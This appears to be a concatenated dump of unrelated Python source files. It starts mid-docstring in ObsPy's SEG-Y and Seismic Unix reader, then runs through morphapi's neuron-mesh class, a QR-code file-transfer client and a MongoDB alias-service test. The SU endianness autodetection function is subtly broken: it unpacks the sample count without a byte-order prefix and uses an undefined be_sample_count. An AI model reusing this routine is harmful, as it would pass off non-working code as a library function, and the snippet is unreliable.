attempted.\n :type unpack_headers: bool\n :param unpack_headers: Determines whether or not all headers will be\n unpacked during reading the file. Has a huge impact on the memory usage\n and the performance. They can be unpacked on-the-fly after being read.\n Defaults to False.\n :type headonly: bool\n :param headonly: Determines whether or not the actual data records will be\n read and unpacked. Has a huge impact on memory usage. Data will not be\n unpackable on-the-fly after reading the file. Defaults to False.\n \"\"\"\n # Open the file if it is not a file like object.\n if not hasattr(file, 'read') or not hasattr(file, 'tell') or not \\\n hasattr(file, 'seek'):\n with open(file, 'rb') as open_file:\n return _internal_read_segy(\n open_file, endian=endian,\n textual_header_encoding=textual_header_encoding,\n unpack_headers=unpack_headers, headonly=headonly)\n # Otherwise just read it.\n return _internal_read_segy(file, endian=endian,\n textual_header_encoding=textual_header_encoding,\n unpack_headers=unpack_headers,\n headonly=headonly)\n\n\ndef _internal_read_segy(file, endian=None, textual_header_encoding=None,\n unpack_headers=False, headonly=False):\n \"\"\"\n Reads on open file object and returns a SEGYFile object.\n\n :param file: Open file like object.\n :type endian: str\n :param endian: String that determines the endianness of the file. Either\n '>' for big endian or '<' for little endian. If it is None,\n obspy.io.segy will try to autodetect the endianness. The endianness\n is always valid for the whole file.\n :param textual_header_encoding: The encoding of the textual header.\n Either 'EBCDIC', 'ASCII' or None. If it is None, autodetection will\n be attempted.\n :type unpack_headers: bool\n :param unpack_headers: Determines whether or not all headers will be\n unpacked during reading the file. Has a huge impact on the memory usage\n and the performance. They can be unpacked on-the-fly after being read.\n Defaults to False.\n :type headonly: bool\n :param headonly: Determines whether or not the actual data records will be\n read and unpacked. Has a huge impact on memory usage. Data will not be\n unpackable on-the-fly after reading the file. Defaults to False.\n \"\"\"\n return SEGYFile(file, endian=endian,\n textual_header_encoding=textual_header_encoding,\n unpack_headers=unpack_headers, headonly=headonly)\n\n\ndef iread_segy(file, endian=None, textual_header_encoding=None,\n unpack_headers=False, headonly=False):\n \"\"\"\n Iteratively read a SEG-Y field and yield single ObsPy Traces.\n\n The function iteratively loops over the whole file and yields single\n ObsPy Traces. The next Trace will be read after the current loop has\n finished - this function is thus suitable for reading arbitrarily large\n SEG-Y files without running into memory problems.\n\n >>> from obspy.core.util import get_example_file\n >>> filename = get_example_file(\"00001034.sgy_first_trace\")\n >>> from obspy.io.segy.segy import iread_segy\n >>> for tr in iread_segy(filename):\n ... # Each Trace's stats attribute will have references to the file\n ... # headers and some more information.\n ... tf = tr.stats.segy.textual_file_header\n ... bf = tr.stats.segy.binary_file_header\n ... tfe = tr.stats.segy.textual_file_header_encoding\n ... de = tr.stats.segy.data_encoding\n ... e = tr.stats.segy.endian\n ... # Also do something meaningful with each Trace.\n ... print(int(tr.data.sum() * 1E9))\n -5\n\n :param file: Open file like object or a string which will be assumed to be\n a filename.\n :type endian: str\n :param endian: String that determines the endianness of the file. Either\n '>' for big endian or '<' for little endian. If it is None,\n obspy.io.segy will try to autodetect the endianness. The endianness\n is always valid for the whole file.\n :param textual_header_encoding: The encoding of the textual header.\n Either 'EBCDIC', 'ASCII' or None. If it is None, autodetection will\n be attempted.\n :type unpack_headers: bool\n :param unpack_headers: Determines whether or not all headers will be\n unpacked during reading the file. Has a huge impact on the memory usage\n and the performance. They can be unpacked on-the-fly after being read.\n Defaults to False.\n :type headonly: bool\n :param headonly: Determines whether or not the actual data records will be\n read and unpacked. Has a huge impact on memory usage. Data will not be\n unpackable on-the-fly after reading the file. Defaults to False.\n \"\"\"\n # Open the file if it is not a file like object.\n if not hasattr(file, 'read') or not hasattr(file, 'tell') or not \\\n hasattr(file, 'seek'):\n with open(file, 'rb') as open_file:\n for tr in _internal_iread_segy(\n open_file, endian=endian,\n textual_header_encoding=textual_header_encoding,\n unpack_headers=unpack_headers, headonly=headonly):\n yield tr\n return\n # Otherwise just read it.\n for tr in _internal_iread_segy(\n file, endian=endian,\n textual_header_encoding=textual_header_encoding,\n unpack_headers=unpack_headers, headonly=headonly):\n yield tr\n\n\ndef _internal_iread_segy(file, endian=None, textual_header_encoding=None,\n unpack_headers=False, headonly=False):\n \"\"\"\n Iteratively read a SEG-Y field and yield single ObsPy Traces.\n \"\"\"\n segy_file = SEGYFile(\n file, endian=endian, textual_header_encoding=textual_header_encoding,\n unpack_headers=unpack_headers, headonly=headonly, read_traces=False)\n for trace in segy_file._read_traces(unpack_headers=unpack_headers,\n headonly=headonly,\n yield_each_trace=True):\n tr = trace.to_obspy_trace(unpack_trace_headers=unpack_headers,\n headonly=headonly)\n # Fill stats that are normally attached to the stream stats.\n tr.stats.segy.textual_file_header = segy_file.textual_file_header\n tr.stats.segy.binary_file_header = segy_file.binary_file_header\n tr.stats.segy.textual_file_header_encoding = \\\n segy_file.textual_header_encoding.upper()\n tr.stats.segy.data_encoding = trace.data_encoding\n tr.stats.segy.endian = trace.endian\n tr.stats._format = \"SEGY\"\n yield tr\n\n\ndef iread_su(file, endian=None, unpack_headers=False, headonly=False):\n \"\"\"\n Iteratively read a SU field and yield single ObsPy Traces.\n\n The function iteratively loops over the whole file and yields single\n ObsPy Traces. The next Trace will be read after the current loop has\n finished - this function is thus suitable for reading arbitrarily large\n SU files without running into memory problems.\n\n >>> from obspy.core.util import get_example_file\n >>> filename = get_example_file(\"1.su_first_trace\")\n >>> from obspy.io.segy.segy import iread_su\n >>> for tr in iread_su(filename):\n ... # Each Trace's stats attribute will have some file-wide\n ... # information.\n ... de = tr.stats.su.data_encoding\n ... e = tr.stats.su.endian\n ... # Also do something meaningful with each Trace.\n ... print(int(tr.data.sum()))\n -26121\n\n :param file: Open file like object or a string which will be assumed to be\n a filename.\n :type endian: str\n :param endian: String that determines the endianness of the file. Either\n '>' for big endian or '<' for little endian. If it is None,\n obspy.io.segy will try to autodetect the endianness. The endianness\n is always valid for the whole file.\n :type unpack_headers: bool\n :param unpack_headers: Determines whether or not all headers will be\n unpacked during reading the file. Has a huge impact on the memory usage\n and the performance. They can be unpacked on-the-fly after being read.\n Defaults to False.\n :type headonly: bool\n :param headonly: Determines whether or not the actual data records will be\n read and unpacked. Has a huge impact on memory usage. Data will not be\n unpackable on-the-fly after reading the file. Defaults to False.\n \"\"\"\n # Open the file if it is not a file like object.\n if not hasattr(file, 'read') or not hasattr(file, 'tell') or not \\\n hasattr(file, 'seek'):\n with open(file, 'rb') as open_file:\n for tr in _internal_iread_su(\n open_file, endian=endian,\n unpack_headers=unpack_headers, headonly=headonly):\n yield tr\n return\n # Otherwise just read it.\n for tr in _internal_iread_su(\n file, endian=endian,\n unpack_headers=unpack_headers, headonly=headonly):\n yield tr\n\n\ndef _internal_iread_su(file, endian=None, unpack_headers=False,\n headonly=False):\n \"\"\"\n Iteratively read a SU field and yield single ObsPy Traces.\n \"\"\"\n su_file = SUFile(\n file, endian=endian, unpack_headers=unpack_headers, headonly=headonly,\n read_traces=False)\n for trace in su_file._read_traces(unpack_headers=unpack_headers,\n headonly=headonly,\n yield_each_trace=True):\n tr = trace.to_obspy_trace(unpack_trace_headers=unpack_headers,\n headonly=headonly)\n tr.stats.su = tr.stats.segy\n del tr.stats.segy\n # Fill stats that are normally attached to the stream stats.\n tr.stats.su.data_encoding = trace.data_encoding\n tr.stats.su.endian = trace.endian\n tr.stats._format = \"SU\"\n yield tr\n\n\nclass SUFile(object):\n \"\"\"\n Convenience class that internally handles Seismic Unix data files. It\n currently can only read IEEE 4 byte float encoded SU data files.\n \"\"\"\n def __init__(self, file=None, endian=None, unpack_headers=False,\n headonly=False, read_traces=True):\n \"\"\"\n :param file: A file like object with the file pointer set at the\n beginning of the SEG Y file. If file is None, an empty SEGYFile\n object will be initialized.\n\n :param endian: The endianness of the file. If None, autodetection will\n be used.\n :type unpack_header: bool\n :param unpack_header: Determines whether or not all headers will be\n unpacked during reading the file. Has a huge impact on the memory\n usage and the performance. They can be unpacked on-the-fly after\n being read. Defaults to False.\n :type headonly: bool\n :param headonly: Determines whether or not the actual data records\n will be read and unpacked. Has a huge impact on memory usage. Data\n will not be unpackable on-the-fly after reading the file.\n Defaults to False.\n :type read_traces: bool\n :param read_traces: Data traces will only be read if this is set to\n ``True``. The data will be completely ignored if this is set to\n ``False``.\n \"\"\"\n if file is None:\n self._create_empty_su_file_object()\n return\n # Set the endianness to big.\n if endian is None:\n self.endian = '>'\n else:\n self.endian = ENDIAN[endian]\n return\n self.file = file\n # If endian is None autodetect is.\n if not endian:\n self._autodetect_endianness()\n else:\n self.endian = ENDIAN[endian]\n if read_traces:\n # Read the actual traces.\n [i for i in self._read_traces(unpack_headers=unpack_headers,\n headonly=headonly)]\n\n def _autodetect_endianness(self):\n \"\"\"\n Tries to automatically determine the endianness of the file at hand.\n \"\"\"\n self.endian = autodetect_endian_and_sanity_check_su(self.file)\n if self.endian is False:\n msg = 'Autodetection of Endianness failed. Please specify it ' + \\\n 'by hand or contact the developers.'\n raise Exception(msg)\n\n def _create_empty_su_file_object(self):\n \"\"\"\n Creates an empty SUFile object.\n \"\"\"\n self.traces = []\n\n def __str__(self):\n \"\"\"\n Prints some information about the SU file.\n \"\"\"\n return '%i traces in the SU structure.' % len(self.traces)\n\n def _repr_pretty_(self, p, cycle):\n p.text(str(self))\n\n def _read_traces(self, unpack_headers=False, headonly=False,\n yield_each_trace=False):\n \"\"\"\n Reads the actual traces starting at the current file pointer position\n to the end of the file.\n\n :type unpack_header: bool\n :param unpack_header: Determines whether or not all headers will be\n unpacked during reading the file. Has a huge impact on the memory\n usage and the performance. They can be unpacked on-the-fly after\n being read. Defaults to False.\n :type headonly: bool\n :param headonly: Determines whether or not the actual data records\n will be unpacked. Useful if one is just interested in the headers.\n Data will not be unpackable on-the-fly after reading the file.\n Defaults to False.\n :type yield_each_trace: bool\n :param yield_each_trace: If True, it will yield each trace after it\n has been read. This enables a simple implementation of a\n streaming interface to read SEG-Y files. Read traces will no\n longer be collected in ``self.traces`` list if this is set to\n ``True``.\n \"\"\"\n self.traces = []\n # Big loop to read all data traces.\n while True:\n # Read and as soon as the trace header is too small abort.\n try:\n # Always unpack with IEEE\n trace = SEGYTrace(self.file, 5, self.endian,\n unpack_headers=unpack_headers,\n headonly=headonly)\n if yield_each_trace:\n yield trace\n else:\n self.traces.append(trace)\n except SEGYTraceHeaderTooSmallError:\n break\n\n def write(self, file, endian=None):\n \"\"\"\n Write a SU Y file to file which is either a file like object with a\n write method or a filename string.\n\n If endian is set it will be enforced.\n \"\"\"\n if not hasattr(file, 'write'):\n with open(file, 'wb') as file:\n self._write(file, endian=endian)\n return\n self._write(file, endian=endian)\n\n def _write(self, file, endian=None):\n \"\"\"\n Write a SU Y file to file which is either a file like object with a\n write method or a filename string.\n\n If endian is set it will be enforced.\n \"\"\"\n # Write all traces.\n for trace in self.traces:\n trace.write(file, data_encoding=5, endian=endian)\n\n\ndef _read_su(file, endian=None, unpack_headers=False, headonly=False):\n \"\"\"\n Reads a Seismic Unix (SU) file and returns a SUFile object.\n\n :param file: Open file like object or a string which will be assumed to be\n a filename.\n :type endian: str\n :param endian: String that determines the endianness of the file. Either\n '>' for big endian or '<' for little endian. If it is None,\n obspy.io.segy will try to autodetect the endianness. The endianness\n is always valid for the whole file.\n :type unpack_header: bool\n :param unpack_header: Determines whether or not all headers will be\n unpacked during reading the file. Has a huge impact on the memory usage\n and the performance. They can be unpacked on-the-fly after being read.\n Defaults to False.\n :type headonly: bool\n :param headonly: Determines whether or not the actual data records will be\n unpacked. Useful if one is just interested in the headers. Defaults to\n False.\n \"\"\"\n # Open the file if it is not a file like object.\n if not hasattr(file, 'read') or not hasattr(file, 'tell') or not \\\n hasattr(file, 'seek'):\n with open(file, 'rb') as open_file:\n return _internal_read_su(open_file, endian=endian,\n unpack_headers=unpack_headers,\n headonly=headonly)\n # Otherwise just read it.\n return _internal_read_su(file, endian=endian,\n unpack_headers=unpack_headers, headonly=headonly)\n\n\ndef _internal_read_su(file, endian=None, unpack_headers=False, headonly=False):\n \"\"\"\n Reads on open file object and returns a SUFile object.\n\n :param file: Open file like object.\n :type endian: str\n :param endian: String that determines the endianness of the file. Either\n '>' for big endian or '<' for little endian. If it is None,\n obspy.io.segy will try to autodetect the endianness. The endianness\n is always valid for the whole file.\n :type unpack_header: bool\n :param unpack_header: Determines whether or not all headers will be\n unpacked during reading the file. Has a huge impact on the memory usage\n and the performance. They can be unpacked on-the-fly after being read.\n Defaults to False.\n :type headonly: bool\n :param headonly: Determines whether or not the actual data records will be\n unpacked. Useful if one is just interested in the headers. Defaults to\n False.\n \"\"\"\n return SUFile(file, endian=endian, unpack_headers=unpack_headers,\n headonly=headonly)\n\n\ndef autodetect_endian_and_sanity_check_su(file):\n \"\"\"\n Takes an open file and tries to determine the endianness of a Seismic\n Unix data file by doing some sanity checks with the unpacked header values.\n\n Returns False if the sanity checks failed and the endianness otherwise.\n\n It is assumed that the data is written as 32bit IEEE floating points in\n either little or big endian.\n\n The test currently can only identify SU files in which all traces have the\n same length. It basically just makes a sanity check for various fields in\n the Trace header.\n \"\"\"\n pos = file.tell()\n if isinstance(file, io.BytesIO):\n file.seek(0, 2)\n size = file.tell()\n file.seek(pos, 0)\n else:\n size = os.fstat(file.fileno())[6]\n if size < 244:\n return False\n # Also has to be a multiple of 4 in length because every header is 400 long\n # and every data value 4 byte long.\n elif (size % 4) != 0:\n return False\n # Jump to the number of samples field in the trace header.\n file.seek(114, 0)\n sample_count = file.read(2)\n interval = file.read(2)\n # Jump to the beginning of the year fields.\n file.seek(156, 0)\n year = file.read(2)\n jul_day = file.read(2)\n hour = file.read(2)\n minute = file.read(2)\n second = file.read(2)\n # Jump to previous position.\n file.seek(pos, 0)\n # Unpack in little and big endian.\n le_sample_count = unpack(b'h', sample_count)[0]\n # Check if both work.\n working_byteorders = []\n if le_sample_count > 0:\n length = 240 + (le_sample_count * 4)\n if (size % length) == 0:\n working_byteorders.append('<')\n if be_sample_count > 0:\n length = 240 + (be_sample_count * 4)\n if (size % length) == 0:\n working_byteorders.append('>')\n # If None works return False.\n if len(working_byteorders) == 0:\n return False\n # Check if the other header values make sense.\n still_working_byteorders = []\n for bo in working_byteorders:\n fmt = (\"%sh\" % bo).encode('ascii', 'strict')\n this_interval = unpack(fmt, interval)[0]\n this_year = unpack(fmt, year)[0]\n this_julday = unpack(fmt, jul_day)[0]\n this_hour = unpack(fmt, hour)[0]\n this_minute = unpack(fmt, minute)[0]\n this_second = unpack(fmt, second)[0]\n # Make a sanity check for each.\n # XXX: The arbitrary maximum of the sample interval is 10 seconds.\n if this_interval <= 0 or this_interval > 10E7:\n continue\n # Some programs write two digit years.\n if this_year != 0 and (this_year < 1930 or this_year >= 2030) and \\\n (this_year < 0 or this_year >= 100):\n continue\n # 9999 is often used as a placeholder\n if (this_julday > 366 or this_julday < 0) and this_julday != 9999:\n continue\n if this_hour > 24 or this_hour < 0:\n continue\n if this_minute > 60 or this_minute < 0:\n continue\n if this_second > 60 or this_second < 0:\n continue\n still_working_byteorders.append(bo)\n length = len(still_working_byteorders)\n if not length:\n return False\n elif length == 1:\n return still_working_byteorders[0]\n else:\n # XXX: In the unlikely case both byte orders pass the sanity checks\n # something else should be checked. Currently it is not.\n msg = \"\"\"\n Both possible byte orders passed all sanity checks. Please contact\n the ObsPy developers so they can implement additional tests.\n \"\"\".strip()\n raise Exception(msg)\n","repo_name":"obspy/obspy","sub_path":"obspy/io/segy/segy.py","file_name":"segy.py","file_ext":"py","file_size_in_byte":59800,"program_lang":"python","lang":"en","doc_type":"code","stars":1088,"dataset":"github-code","pt":"92"} +{"seq_id":"70863503661","text":"import logging\nfrom collections import namedtuple\nfrom pathlib import Path\n\nimport neurom as nm\nfrom neurom.core.dataformat import COLS\nfrom vedo import merge\nfrom vedo.colors import colorMap\nfrom vedo.shapes import Sphere\nfrom vedo.shapes import Tube\n\ntry:\n # For NeuroM >= 3\n from neurom.core.morphology import iter_sections\nexcept ImportError:\n # For NeuroM < 2\n try:\n from neurom.core import iter_sections\n except ImportError:\n # For NeuroM >= 2, < 3\n from neurom import iter_sections\n\nfrom morphapi.morphology.cache import NeuronCache\n\nlogger = logging.getLogger(__name__)\n\ncomponent = namedtuple(\"component\", \"x y z coords radius component\")\n\n\nclass Neuron(NeuronCache):\n _neurite_types = {\n \"basal_dendrites\": nm.core.types.NeuriteType.basal_dendrite,\n \"apical_dendrites\": nm.core.types.NeuriteType.apical_dendrite,\n \"axon\": nm.core.types.NeuriteType.axon,\n }\n\n _ntypes = nm.core.types.NEURITES\n\n def __init__(\n self,\n data_file,\n neuron_name=None,\n invert_dims=False,\n load_file=True,\n **kwargs,\n ):\n super().__init__(**kwargs) # path to data caches\n\n self.invert_dims = invert_dims\n self.neuron_name = neuron_name\n\n self.data_file = Path(data_file)\n self.data_file_type = self.data_file.suffix[1:]\n\n if self.data_file_type not in [\"swc\", \"json\"]:\n raise ValueError(\"Invalid data file type, should be swc or jon\")\n\n if self.neuron_name is None:\n self.neuron_name = self.data_file.name\n\n if load_file:\n self.load_from_file()\n else:\n self.points = None\n\n def load_from_file(self):\n if not self.data_file.exists():\n raise ValueError(\"The specified path does not exist!\")\n\n if self.data_file_type is None:\n return\n elif self.data_file_type == \"json\":\n raise NotImplementedError\n else:\n self.load_from_swc()\n\n def repair_swc_file(self):\n \"\"\"\n Fixes this: https://github.com/BlueBrain/NeuroM/issues/835\n \"\"\"\n with open(self.data_file, \"r\") as read:\n content = read.readlines()\n\n clean = []\n for line in content:\n if not len(line):\n clean.append(line)\n continue\n\n line = line.replace(\"\\n\", \"\").replace(\"\\t\", \" \")\n vals = line.split(\" \")\n if len(vals) < 2:\n clean.append(line)\n continue\n\n if vals[1] != \"1\" and vals[-1] == \"-1\":\n vals[-1] = \"0\"\n clean.append(\" \".join(vals))\n else:\n clean.append(line)\n\n if len(clean) != len(content):\n raise ValueError\n\n with open(self.data_file, \"w\") as write:\n for line in clean:\n write.write(f\"{line}\\n\")\n\n def load_from_swc(self):\n if self.neuron_name is None:\n self.neuron_name = self.data_file.name\n\n self.repair_swc_file()\n\n nrn = nm.load_morphology(self.data_file)\n\n # Get position and radius of some\n soma_pos = nrn.soma.points[0, :3]\n soma_radius = nrn.soma.points[0, -1]\n\n # Get the rest of the data and store it\n self.morphology = nrn\n self.points = dict(\n soma=component(\n soma_pos[0],\n soma_pos[1],\n soma_pos[2],\n soma_pos,\n soma_radius,\n nrn.soma,\n ),\n )\n\n for ntype, nclass in self._neurite_types.items():\n self.points[ntype] = [\n component(\n n.points[:, 0],\n n.points[:, 1],\n n.points[:, 2],\n n.points[:, :3],\n n.points[:, -1],\n n,\n )\n for n in nrn.neurites\n if n.type == nclass\n ]\n\n def _parse_mesh_kwargs(self, **kwargs):\n # To give the entire neuron the same color\n neuron_color = kwargs.pop(\"neuron_color\", None)\n\n # To give the entire neuron a color based on a cmap\n neuron_number = kwargs.pop(\"neuron_number\", None)\n cmap_lims = kwargs.pop(\"cmap_lims\", (-1, 1))\n cmap = kwargs.pop(\"cmap\", None)\n\n # To color each component individually\n soma_color = kwargs.pop(\"soma_color\", \"salmon\")\n apical_dendrites_color = kwargs.pop(\"apical_dendrites_color\", \"salmon\")\n basal_dendrites_color = kwargs.pop(\n \"basal_dendrites_color\", apical_dendrites_color\n )\n axon_color = kwargs.pop(\"axon_color\", \"salmon\")\n whole_neuron_color = kwargs.pop(\"whole_neuron_color\", None)\n\n # Get each components color from args\n if neuron_color is not None: # uniform color\n soma_color = (\n apical_dendrites_color\n ) = basal_dendrites_color = axon_color = neuron_color\n elif cmap is not None: # color according to cmap\n if neuron_number is None:\n neuron_number = 0\n\n soma_color = colorMap(\n neuron_number, name=cmap, vmin=cmap_lims[0], vmax=cmap_lims[1]\n )\n apical_dendrites_color = (\n basal_dendrites_color\n ) = axon_color = soma_color\n\n else: # Use color specified for each component\n pass\n\n if whole_neuron_color is None:\n whole_neuron_color = soma_color\n return (\n soma_color,\n apical_dendrites_color,\n basal_dendrites_color,\n axon_color,\n whole_neuron_color,\n kwargs,\n )\n\n def create_mesh(\n self, neurite_radius=2, soma_radius=4, use_cache=True, **kwargs\n ):\n if self.points is None:\n logger.warning(\n \"No data loaded, you can use the 'load_from_file' method to try to load the file.\"\n )\n return\n\n # Parse kwargs\n (\n soma_color,\n apical_dendrites_color,\n basal_dendrites_color,\n axon_color,\n whole_neuron_color,\n kwargs,\n ) = self._parse_mesh_kwargs(**kwargs)\n\n if (\n not isinstance(neurite_radius, (int, float))\n or not neurite_radius > 0\n ):\n raise ValueError(\n \"Invalid value for parameter neurite_radius, should be a float > 0\"\n )\n if not isinstance(soma_radius, (int, float)) or not soma_radius > 0:\n raise ValueError(\n \"Invalid value for parameter soma_radius, should be a float > 0\"\n )\n # prepare params dict for caching\n _params = dict(neurite_radius=neurite_radius, soma_radius=soma_radius)\n\n # Check if cached files already exist\n if use_cache:\n neurites = self.load_cached_neuron(self.neuron_name, _params)\n else:\n neurites = None\n\n # Render\n if neurites is not None:\n whole_neuron = neurites.pop(\"whole_neuron\")\n neurites[\"soma\"].c(soma_color)\n else:\n # Create soma actor\n neurites = {}\n coords = self.points[\"soma\"].coords\n if self.invert_dims:\n coords = coords[[2, 1, 0]]\n\n soma = Sphere(\n pos=coords,\n r=self.points[\"soma\"].radius * soma_radius,\n c=soma_color,\n ).compute_normals()\n neurites[\"soma\"] = soma.clone().c(soma_color)\n\n # Create neurites actors\n for ntype in self._neurite_types:\n actors = []\n for neurite in self.points[ntype]:\n for section in iter_sections(neurite.component):\n for child in section.children:\n if not child.children:\n coords = child.points[:, COLS.XYZ]\n if self.invert_dims:\n coords = coords[:, [2, 1, 0]]\n actors.append(Tube(coords, r=neurite_radius))\n else:\n for grandchild in child.children:\n coords = grandchild.points[:, COLS.XYZ]\n if self.invert_dims:\n coords = coords[:, [2, 1, 0]]\n actors.append(\n Tube(coords, r=neurite_radius)\n )\n\n if actors:\n neurites[ntype] = merge(\n actors\n ).compute_normals() # .smoothMLS2D(f=0.1)\n else:\n neurites[ntype] = None\n\n # Merge actors to get the entire neuron\n actors = [\n act.clone() for act in neurites.values() if act is not None\n ]\n whole_neuron = merge(actors).clean().compute_normals()\n\n # Write to cache\n to_write = neurites.copy()\n to_write[\"whole_neuron\"] = whole_neuron\n self.write_neuron_to_cache(self.neuron_name, to_write, _params)\n\n # Color actors\n colors = [basal_dendrites_color, apical_dendrites_color, axon_color]\n for n, key in enumerate(\n [\"basal_dendrites\", \"apical_dendrites\", \"axon\"]\n ):\n if neurites[key] is not None:\n neurites[key] = neurites[key].c(colors[n])\n whole_neuron.c(whole_neuron_color)\n\n return neurites, whole_neuron\n","repo_name":"brainglobe/morphapi","sub_path":"morphapi/morphology/morphology.py","file_name":"morphology.py","file_ext":"py","file_size_in_byte":9755,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"92"} +{"seq_id":"16798022283","text":"import base64\nfrom time import sleep\nfrom PIL import Image\n\nimport cv2\n\nfrom utils import BREAK_KEY, DEBUG, EOF, FIRST_CHUNK_INDEX, create_qr, get_next_index, trace\n\n_ACK_WINDOW = 'ack'\n\n@trace\ndef _next_chunk(frame):\n \"\"\"\n Read the next file chunk from frame, \n if chunk is EOF, we return it's index and done=true\n if chunk does not exist, we return no data and done=false\n if chunk exists, we return it's data and index.\n \"\"\"\n chunk, _, _ = cv2.QRCodeDetector().detectAndDecode(frame)\n\n if len(chunk) == 0:\n return None, None, False\n\n i = int(chunk[:1])\n chunk = chunk[1:]\n\n if chunk == EOF: # If we encountered the end of transmission QR\n return i, None, True\n\n return i, base64.standard_b64decode(chunk), False\n\n@trace\ndef _ack(i):\n \"\"\"\n Show an ack for index `i`\n\n i integer\n \"\"\"\n img = create_qr(str(i).encode())\n if DEBUG:\n Image.fromarray(img).save(f\"ack_{i}.png\")\n cv2.imshow(_ACK_WINDOW, img)\n\ndef _read_loop(f, cap):\n \"\"\"\n This is the read loop,\n we read a frame, if it has significant data, we write it to the file.\n\n f file descriptor\n cap cv2.VideoCapture\n \"\"\"\n next_index = FIRST_CHUNK_INDEX \n\n while True:\n _, frame = cap.read()\n if frame is None:\n raise IOError(\"Can't read from camera\")\n\n i, data, done = _next_chunk(frame)\n if done:\n _ack(i)\n cv2.waitKey(10000) # Show the final ack for 10 seconds, then exit\n return\n\n if data is None:\n sleep(1)\n continue\n\n if i == next_index: # we got the correct chunk, write it and keep going\n f.write(data)\n next_index = get_next_index(next_index)\n\n _ack(i) # ack even if we didn't get the correct index\n\n # Stop the loop if BREAK_KEY is pressed, for testing purposes.\n if cv2.waitKey(1) & 0xFF == ord(BREAK_KEY):\n break\n@trace\ndef read_file_to_path(cap, path):\n \"\"\"\n Write a file from qr capture to file path\n\n cap cv2.VideoCapture\n path file path\n \"\"\"\n with open(path, 'wb') as f:\n _read_loop(f, cap)\n\n\n cv2.destroyAllWindows()\n\n","repo_name":"yairfrid/qr_ft","sub_path":"qr_client.py","file_name":"qr_client.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"17934009208","text":"import unittest\nimport alias_service\nfrom mock import patch, Mock\nimport mongomock\nfrom ConfigParser import ConfigParser\nfrom dao import Dao\nfrom model import *\nimport json\nfrom bson.objectid import ObjectId\nfrom pymongo import MongoClient\n\nDATABASE_NAME = 'garpr_test'\nCONFIG_LOCATION = 'config/config.ini'\n\nclass TestAliasService(unittest.TestCase):\n @classmethod\n def setUpClass(self):\n config = ConfigParser()\n config.read(CONFIG_LOCATION)\n username = config.get('database', 'user')\n host = config.get('database', 'host')\n auth_db = config.get('database', 'auth_db')\n password = config.get('database', 'password')\n self.mongo_client = MongoClient(host='mongodb://%s:%s@%s/%s' % (username, password, host, auth_db))\n self.mongo_client.drop_database(DATABASE_NAME)\n\n def setUp(self):\n self.maxDiff = None\n\n self.player_1_id = ObjectId()\n self.player_2_id = ObjectId()\n self.player_3_id = ObjectId()\n self.player_4_id = ObjectId()\n self.player_5_id = ObjectId()\n self.player_1 = Player(\n name='gaR',\n aliases=['gar', 'garr'],\n ratings={'norcal': Rating(), 'texas': Rating()},\n regions=['norcal', 'texas'],\n id=self.player_1_id)\n self.player_2 = Player(\n name='sfat',\n aliases=['sfat', 'miom | sfat'],\n ratings={'norcal': Rating()},\n regions=['norcal'],\n id=self.player_2_id)\n self.player_3 = Player(\n name='mango',\n aliases=['mango', 'gar'],\n ratings={'norcal': Rating(mu=2, sigma=3)},\n regions=['socal'],\n id=self.player_3_id)\n self.player_4 = Player(\n name='garpr|gar',\n aliases=['garpr|gar'],\n ratings={'norcal': Rating(mu=2, sigma=3)},\n regions=['norcal'],\n id=self.player_4_id)\n\n self.players = [self.player_1, self.player_2, self.player_3, self.player_4]\n\n self.user_id_1 = 'abc123'\n self.user_admin_regions_1 = ['norcal']\n self.username1 = 'Full Name'\n # def __init__(self, id, admin_regions, username, salt, hashed_password):\n self.user_1 = User(id=self.user_id_1,\n admin_regions=self.user_admin_regions_1,\n username=self.username1,\n salt='nacl',\n hashed_password='browns')\n\n self.users = [self.user_1]\n\n self.region_1 = Region(id='norcal', display_name='Norcal')\n Dao.insert_region(self.region_1, self.mongo_client, database_name=DATABASE_NAME)\n self.norcal_dao = Dao('norcal', self.mongo_client, database_name=DATABASE_NAME)\n\n for player in self.players:\n self.norcal_dao.insert_player(player)\n\n\n def tearDown(self):\n self.mongo_client.drop_database(DATABASE_NAME)\n\n def test_get_player_suggestions_from_player_aliases(self):\n self.assertEquals(alias_service.get_player_suggestions_from_player_aliases(self.norcal_dao, ['gar', 'garpr | gar', 'g a r r']),\n {\n \"gar\": [self.player_1, self.player_3],\n \"garpr | gar\": [self.player_1, self.player_3, self.player_4],\n \"g a r r\": [self.player_1]\n })\n\n def test_get_player_or_suggestions_from_player_aliases(self):\n self.assertEquals(alias_service.get_player_or_suggestions_from_player_aliases(self.norcal_dao, ['gar', 'garpr | gar', 'g a r r']),\n {\n \"gar\": {\n \"player\": self.player_1,\n \"suggestions\": [self.player_1, self.player_3]\n },\n \"garpr | gar\": {\n \"player\": None,\n \"suggestions\": [self.player_1, self.player_3, self.player_4],\n },\n \"g a r r\": {\n \"player\": None,\n \"suggestions\": [self.player_1]\n }\n })\n\n def test_get_top_suggestion_for_aliases(self):\n suggestions = alias_service.get_top_suggestion_for_aliases(self.norcal_dao, ['gar', 'garpr | gar'])\n expected_suggestions = {\n \"gar\": self.player_1,\n \"garpr | gar\": self.player_1,\n }\n\n self.assertEquals(suggestions, expected_suggestions)\n\n def test_get_top_suggestion_for_aliases_none(self):\n suggestions = alias_service.get_top_suggestion_for_aliases(self.norcal_dao, ['gar', 'garpr | gar', 'ASDFASDF'])\n expected_suggestions = {\n \"gar\": self.player_1,\n \"garpr | gar\": self.player_1,\n \"ASDFASDF\": None\n }\n\n self.assertEquals(suggestions, expected_suggestions)\n\n def test_get_alias_to_id_map_in_list_format(self):\n suggestions = alias_service.get_alias_to_id_map_in_list_format(\n self.norcal_dao, ['gar', 'garpr | gar', 'ASDFASDF'])\n expected_suggestions = [\n AliasMapping(player_alias=\"gar\", player_id=self.player_1.id),\n AliasMapping(player_alias=\"garpr | gar\", player_id=self.player_1.id),\n AliasMapping(player_alias=\"ASDFASDF\", player_id=None)\n ]\n\n self.assertEquals(len(suggestions), 3)\n self.assertTrue(expected_suggestions[0] in suggestions)\n self.assertTrue(expected_suggestions[1] in suggestions)\n self.assertTrue(expected_suggestions[2] in suggestions)\n","repo_name":"garsh0p/garpr","sub_path":"test/test_alias_service.py","file_name":"test_alias_service.py","file_ext":"py","file_size_in_byte":5545,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"92"} +{"seq_id":"11411896987","text":"#\n# @Author: Paolo Rosettani\n# @Date: 24/05/2021 